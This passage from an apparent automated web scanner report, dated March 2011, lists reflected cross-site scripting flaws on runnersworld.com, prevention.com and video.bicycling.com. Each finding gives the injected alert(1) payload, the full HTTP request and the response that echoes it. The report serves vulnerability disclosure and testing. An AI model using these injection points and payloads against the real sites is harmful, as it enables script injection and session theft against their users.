Cookie: __qca=P0-1842843424-1299775204149; preventionprod=R3213878906; ASP.NET_SessionId=yenypbvdewyi2j452irbbh45; SiteLifeHost=preventionprod3l3pluckcom; anonId=69c065c5-d7da-4e8e-bf8d-b0a9856c0902; PVNCURURL=http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4882
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Date: Thu, 10 Mar 2011 22:23:55 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Containerde170";alert(1)//3c37359584b", "<!--Post Summary--><div class=\"Summary_Container\"> <table class=\"Summary_BlogTab
...[SNIP]...

2.20. http://sitelife.runnersworld.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.runnersworld.com
Path:   /ver1.0/Summary/SummaryBlogsRecentPosts

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 659cb"%3balert(1)//605113aabff was submitted in the plckElementId parameter. This input was echoed as 659cb";alert(1)//605113aabff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryBlogsRecentPosts?plckElementId=Summary_Container659cb"%3balert(1)//605113aabff&plckCount=3&plckTagFilter=UserTier:Trusted&plckNoCache=1299775226702&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.runnersworld.com
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: plckARPTrrunworldprod=R3615854285; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm238l3pluckcom
Set-Cookie: SiteLifeHost=l3vm238l3pluckcom; domain=runnersworld.com; path=/
Set-Cookie: anonId=56e05ab0-5adc-4413-8795-093322ab0307; domain=runnersworld.com; expires=Fri, 09-Mar-2012 16:43:42 GMT; path=/
Date: Thu, 10 Mar 2011 16:43:41 GMT
Content-Length: 4586

document.domain = "runnersworld.com";

gSiteLife.InnerHtmlWrite("Summary_Container659cb";alert(1)//605113aabff", "<!--Post Summary--><div class=\"Summary_Container\"> <table class=\"Summary_BlogT
...[SNIP]...

2.21. http://video.bicycling.com/decor/javascript/elements.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/javascript/elements.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef70c"><script>alert(1)</script>a5fc3b044f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decoref70c"><script>alert(1)</script>a5fc3b044f5/javascript/elements.js?3 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=221961b751ef8fd98f0c48221ccd6bbf; path=/; expires=Fri, 11-Mar-2011 16:41:20 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48599
Date: Thu, 10 Mar 2011 16:41:20 GMT
X-Varnish: 908941127
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decoref70c"><script>alert(1)</script>a5fc3b044f5/javascript/elements.js%0AServer: video.bicycling.com%0APath: /decoref70c">
...[SNIP]...

2.22. http://video.bicycling.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/javascript/magnify_pipeline.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 996bb"><script>alert(1)</script>8dae519f5a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decor996bb"><script>alert(1)</script>8dae519f5a0/javascript/magnify_pipeline.js?v1.2 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=1b7bca0cd5f2709c54af5045f9c2daf0; path=/; expires=Fri, 11-Mar-2011 16:41:22 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48630
Date: Thu, 10 Mar 2011 16:41:22 GMT
X-Varnish: 908941357
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decor996bb"><script>alert(1)</script>8dae519f5a0/javascript/magnify_pipeline.js%0AServer: video.bicycling.com%0APath: /decor996bb">
...[SNIP]...

2.23. http://video.bicycling.com/decor/javascript/magnify_stats.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/javascript/magnify_stats.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b2d"><script>alert(1)</script>e97edfb21a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decord5b2d"><script>alert(1)</script>e97edfb21a1/javascript/magnify_stats.js?v1.3 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=d614ec21bddf6a07496656767309fb65; path=/; expires=Fri, 11-Mar-2011 16:41:22 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48619
Date: Thu, 10 Mar 2011 16:41:22 GMT
X-Varnish: 908941360
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decord5b2d"><script>alert(1)</script>e97edfb21a1/javascript/magnify_stats.js%0AServer: video.bicycling.com%0APath: /decord5b2d">
...[SNIP]...

2.24. http://video.bicycling.com/decor/live/transparent.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/live/transparent.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a12b"><script>alert(1)</script>8c0848d39f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decor7a12b"><script>alert(1)</script>8c0848d39f9/live/transparent.gif?keepalive=1299775216667 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=68db2306a40a8ebec98db9dc0efc0be6; path=/; expires=Fri, 11-Mar-2011 16:43:16 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48591
Date: Thu, 10 Mar 2011 16:43:16 GMT
X-Varnish: 908958728
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decor7a12b"><script>alert(1)</script>8c0848d39f9/live/transparent.gif%0AServer: video.bicycling.com%0APath: /decor7a12b">
...[SNIP]...

2.25. http://video.bicycling.com/decor/track/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/track/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26fed"><script>alert(1)</script>9e0a4c4a3bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decor26fed"><script>alert(1)</script>9e0a4c4a3bd/track/dot.gif?time=1299775228891&type=player_embed&session_id=f899d191af7c22c1f7a0d0e1386c14d2&is_video=0&player_embed=1&site=VWFKF2JN1169LWBK&r=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html&v=%2F%2Fw-c%2FC5QKZB153SRSPSH2&c=%2F%2Fci-c%2F21CQ460F9BWWZSF9&sp=enterprise HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:44:02 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48385
Date: Thu, 10 Mar 2011 16:44:02 GMT
X-Varnish: 908964950
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decor26fed"><script>alert(1)</script>9e0a4c4a3bd/track/dot.gif%0AServer: video.bicycling.com%0APath: /decor26fed">
...[SNIP]...

2.26. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97d9"><script>alert(1)</script>e8ac7dae2c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embeda97d9"><script>alert(1)</script>e8ac7dae2c2/player/C5QKZB153SRSPSH2 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=2a4c00ff48e7215ac18c7ed1cef158b5; path=/; expires=Fri, 11-Mar-2011 16:39:44 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48403
Date: Thu, 10 Mar 2011 16:39:44 GMT
X-Varnish: 908926565
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embeda97d9"><script>alert(1)</script>e8ac7dae2c2/player/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embeda97d9">
...[SNIP]...

2.27. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8083"><script>alert(1)</script>a57d2418089 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/playerc8083"><script>alert(1)</script>a57d2418089/C5QKZB153SRSPSH2 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=05fe7f9cdfd092cf9a871960c881b0f7; path=/; expires=Fri, 11-Mar-2011 16:39:57 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48403
Date: Thu, 10 Mar 2011 16:39:57 GMT
X-Varnish: 908928432
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/playerc8083"><script>alert(1)</script>a57d2418089/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed/playerc8083">
...[SNIP]...

2.28. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/C5QKZB153SRSPSH2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d752c'%3balert(1)//9a41a55a16c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d752c';alert(1)//9a41a55a16c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/C5QKZB153SRSPSH2?d752c'%3balert(1)//9a41a55a16c=1 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Date: Thu, 10 Mar 2011 16:39:32 GMT
X-Varnish: 908924841
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 3468


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Embedded Display for Bicycling</title>
   <meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<script type="text/javascript">    
var totalWidth, totalHeight, playerRoot = '/embed/player/', cid = "", referrerObj = {}, referrer = "", queryString = "";
cid = "C5QKZB153SRSPSH2";
queryString = 'd752c';alert(1)//9a41a55a16c=1';
try {
   referrerObj = {
referer: 'http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html',
host: 'video.bicycling.com'
};
   referrer = referrerObj.referer !
...[SNIP]...

2.29. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db69"><script>alert(1)</script>64709e7443c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed6db69"><script>alert(1)</script>64709e7443c/player/container/1075/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:50:11 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48221
Date: Thu, 10 Mar 2011 16:50:11 GMT
X-Varnish: 909019055
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed6db69"><script>alert(1)</script>64709e7443c/player/container/1075/949/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed6db69">
...[SNIP]...

2.30. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add39"><script>alert(1)</script>a90a4b2fe50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/playeradd39"><script>alert(1)</script>a90a4b2fe50/container/1075/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:50:14 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48221
Date: Thu, 10 Mar 2011 16:50:14 GMT
X-Varnish: 909019416
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/playeradd39"><script>alert(1)</script>a90a4b2fe50/container/1075/949/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed/playeradd39">
...[SNIP]...

2.31. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5829<img%20src%3da%20onerror%3dalert(1)>1d66e8cc452 was submitted in the REST URL parameter 4. This input was echoed as b5829<img src=a onerror=alert(1)>1d66e8cc452 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/1075b5829<img%20src%3da%20onerror%3dalert(1)>1d66e8cc452/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 86069
Date: Thu, 10 Mar 2011 16:50:30 GMT
X-Varnish: 909022053
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
